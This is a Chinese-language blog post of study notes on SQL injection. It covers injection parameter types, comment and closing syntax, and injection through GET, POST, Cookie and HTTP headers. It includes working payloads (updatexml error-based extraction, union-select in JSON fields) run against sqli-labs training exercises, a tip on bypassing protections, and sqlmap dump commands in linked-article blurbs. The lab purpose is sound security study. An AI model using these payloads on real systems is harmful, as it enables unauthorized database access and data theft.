12.SQL漏洞-注入类型&请求方法注入

已于 2022-04-14 23:22:06 修改
阅读量4k 收藏 1
点赞数 2
分类专栏: web 文章标签: SQL
于 2022-03-20 15:52:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50854790/article/details/123614733
版权

文章目录

【参数类型】

判断注入类型

1、数字类型

select * from user where id=1

2、字符类型

select * from user where name=‘admin’
过滤’(单引号)和"(双引号)

3、搜索类型

select * from user where name like ‘%admin%’ 只要有admin都会被搜索出来
过滤%(百分号)和’(单引号)
在这里插入图片描述

4、JSON类型

★post提交方式中的一种数据交互格式
JSON格式:
json={“name”:“admin”
“age”:“18”}

$id=1 and 1=2
$sql=“SELECT * FROM users WHERE id=‘1’ and 1=2–+ LIMIT 0,1”;

注释语句

–+、# 注释掉一行
使用POST方式注入大部分用到# 用url注入大部分用到–+

#闭合
必须要将语句闭合,使注入语句生效

#SQL语句干扰符号
'(单引号),"(双引号),%(百分号),)(小括号),}(大括号) 等,具体需看写法

【请求方法】

GET、POST、COOKIE、REQUEST、HTTP头部等

GET请求传输的数据量限制在2KB左右
GET只要在url上,就能接收到请求
REQUEST请求不管是GET和POST都可以
HTTP报文头部各个参数都能注入,比如User-Agent、Cookie

tips: 切换请求方式可能达到绕过防护的效果

【演示实验】

 参数字符型注入测试 sqlilabs Less-1,2,3,4
参考:
https://blog.csdn.net/wang_624/article/details/101913584
 POST数据提交注入测试 sqliabs Less-11

post 发送 不用编码
在这里插入图片描述

 COOKIE数据提交注入测试 sqlilabs Less-20
在这里插入图片描述
报错注入;

' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) #

在这里插入图片描述
联合查询:
在这里插入图片描述
看样子好像没有

 HTTP头部参数数据注入测试 sqlilabs Less-18

在这里插入图片描述

ad'or updatexml(1,concat(0x7e,(database())),1) or '1'='1

在这里插入图片描述

 参数JSON数据注入测试 https://tianchi.aliyun.com/competition/entrance/531796/information
在这里插入图片描述

json 注入

sql语句是json 格式

单引号只是说明它是字符串; { } 花括号是说明json 格式不影响 sql 语句判断

$sql="select * from users where username='{&username}' ";

            json={"username":"admin' and 1=2 union select 1,2,3#"}        ' (单引号)闭合的是SQL语句中的 '

‘#’不会注释双引号
看双引号里面的内容,判断注入语句 就行了
admin’ and 1=2 union select 1,2,3#

明月清风~~
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
第14天:WEB漏洞-SQL注入类型及提交注入1
08-03
在网络安全领域,SQL注入是一种常见的Web漏洞,攻击者通过向应用程序的输入字段中插入恶意的SQL代码,以篡改或获取数据库中的敏感信息。本文将详细介绍SQL注入类型及其提交方式,以及如何进行安全测试。 首先,...
JsonSQL:用SQL语句解析JSON文件
06-19
SQL语法,当然只能用简单的条件查询咯,不过这个用起比较简单,容易上手
Sql注入(手工注入思路、绕过、防御)
Naive的博客
09-26 2426
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
9-sql注入之json注入
m0_62978778的博客
03-15 1614
JSON(JavaScriptObject Notation, JS对象简谱)是一种轻量级的数据交换格式。它基于ECMAScript(European Computer Manufacturers Association, 欧洲计算机协会制定的js规范)的一个子集,采用完全独立于编程语言的文本格式来存储和表示数据。
SQL注入之post注入
最新发布
banliyaoguai的博客
05-21 745
GET请求参数是通过URL传输的,而URL的长度往往被浏览器所限制,通常为2048个字符,因此GET请求参数传输长度是被限制的。GET请求可以被缓存,因为GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,可以使用缓存来提高性能。POST请求不是幂等的,多次相同的POST请求会对服务器的状态产生影响,可能会改变服务器的数据。GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,不会改变服务器的数据。GET请求通过URL的请求行来提交数据,这些数据在URL中是可见的。
sql注入
leekos的博客,分享web安全相关知识~
12-06 1975
sql提交注入
基于JSON的SQL注入攻击触发需要更新Web应用程序防火墙
热门推荐
网络研究观
12-13 1万+
安全研究人员开发了一种通用的 SQL 注入技术,可以绕过多个 Web 应用程序防火墙 (WAF)。问题的核心是 WAF 供应商未能在 SQL 语句中添加对 JSON 的支持,从而使潜在的攻击者可以轻松隐藏其恶意负载。
SQL 注入 GET
weixin_63279914的博客
07-25 320
简单的SQL注入
sql注入的分类:数字型和字符型
qq_45627785的博客
08-05 1498
sql注入: 就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。通过构造恶意的输入,使数据库执行恶意命令,造成数据泄露或者修改内容等,以达到攻击的目的。主要是由于应用程序对用户的输入没有进行严格的过滤而造成的。 一、万能密码 在说sql注入分类之前,先来看一下万能密码的构成原理。万能密码是由于某些程序,通过采用判断sql语句查询结果的值是否大于0,来判断用户输入数据的正确性造成的。当查询之大于0时,代表用户存在,返回true,代表登录成功
墨者学院——SQL注入漏洞测试(POST)
2303_76679642的博客
04-23 650
6.找字段内容“sqlmap -r post.txt --level 5 --risk 3 -D 数据库名 -T 数据表名 -C (字段1,字段2,....) --dump --dbms mysql --batch”5.找数据库表里面的字段“sqlmap -r post.txt --level 5 --risk 3 -D 数据库名 -T 数据表名 --columns --dbms mysql --batch”测试环境为Kali Linux。
YXcms-含有SQL注入漏洞的源码包.zip
03-17
【标题】"YXcms-含有SQL注入漏洞的源码包.zip" 提供了一个关键的安全问题,即SQL注入漏洞,这是许多网站和应用程序面临的一种常见威胁。SQL注入是指攻击者通过在输入字段中插入恶意SQL代码,以获取、修改、删除...
通达OA sql注入漏洞.zip
08-24
然而,就像许多其他复杂的软件系统一样,它可能存在安全漏洞,其中之一就是SQL注入漏洞SQL注入是网络安全中的一个常见问题,允许攻击者通过在输入字段中插入恶意SQL代码来操纵数据库,获取敏感信息,甚至完全控制...
sql高级注入,advanced_sql_injection
08-20
一年多前在网上转悠时遇到的。当时网站的很多信息都从头到尾大概看一遍,现在遇到sql注入及相关问题了。再回头来看看。希望这个网站对大家有所帮助 网站 http://www.sqlsecurity.com/
红帆OA(医疗版)漏洞细节未授权SQL注入请求注入数据包
05-06
红帆OA(医疗版)是**一款专为医疗机构设计的办公自动化软件,旨在提高医院...需要注意的是,尽管红帆OA(医疗版)提供了强大的功能和广泛的应用场景,但任何软件系统都可能存在一定的安全风险,例如SQL注入漏洞等。因
利用SQL注入漏洞登录后台的实现方法
09-11
SQL注入是一种常见的网络安全威胁,它发生在Web应用程序未能充分验证或清理来自用户输入的数据时。攻击者可以利用这种漏洞构造恶意的SQL语句,以获取未经授权的访问或控制数据库。本文将详细阐述SQL注入的原理、步骤...
渗透测试之SQL注入(POST型的四种注入手法)、SQL注入绕过手段
Hi~ 土拨鼠
12-11 7028
文章目录使用BurpSuite进行post请求的抓包使用联合查询进行注入:使用报错注入进行注入:布尔盲注:时延查询:SQL注入绕过手段大小写字母绕过双写绕过编码绕过内联注释绕过 POST和GET的区别就是注入点位置发生了变化,在浏览器中已经无法直接进行查看与修改。当然可以借助对应的插件可以完成修改任务。 使用BurpSuite进行post请求的抓包 以Sqli-Lab Less11为例。 查看抓的包 将抓到的包发送到repeater模块,就可以进行重复测试了 初步判断sql语句大概为:select un
sql 注入实战
终日而思不如须臾所学。
11-30 1914
直接开整 // 后端接口 // get my all todos router.post("/api/todo/list", (req, res) => { let { _openid = 'kong', } = { ...req.body } console.log(_openid) const sql = ` select * from todo_today where _openid = '${_openid}' ` sqlQuery(sql,
linux json 写sql注入,sql注入之json注入(php代码)
weixin_31716637的博客
05-19 732
环境phpstudyphp服务端代码security数据库中的users表中的username,password字段用户名adminJSON服务端代码大家实际测试中注意修改相关的数据库名、表名、字段名等// php防止中文乱码header(‘content-type:text/html;charset=utf-8‘);if(isset($_POST[‘json‘])){$json_str=$_PO...
HTTP请求头引发的注入问题 (SQL注入)
CSDN
08-12 5241
注入的产生原因是因为程序员没有将COOKIE进行合法化检测,并将其代入到了数据库中查询了且查询变量是可控的,当用户登录成功后会产生COOKIE,每次页面刷新后端都会拿着这个COOKIE带入数据库查找,这是非常危险的.HTTP_CLIENT_IP:该属性是PHP内置属性,同样取得的是客户端的IP,同样可控,如果带入数据库,则会产生注入问题。User-Agent 请求头,该请求头携带的是用户浏览器的标识信息,如果此时带入数据库查询,则同样会触发注入问题的产生。查询数据库同样可以爆出,数据库的版本号。
分析sql注入漏洞方法
09-13
SQL注入漏洞的检测方法主要有以下几种: 1. 手工检测:通过手动输入带有特殊字符的数据,如果程序返回了非预期结果,则可能存在注入漏洞。 2. 自动化工具检测:使用自动化工具如sqlmap等,自动扫描网站并尝试注入。 3. 代码审计:通过对程序代码的审计,找出可能存在漏洞的地方。 4. 日志分析:通过分析程序日志,寻找异常记录,可能指示存在注入漏洞。 5. 防御性编程:在编程时使用防御性编程技术,如使用参数化查询来防止注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

明月清风~~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值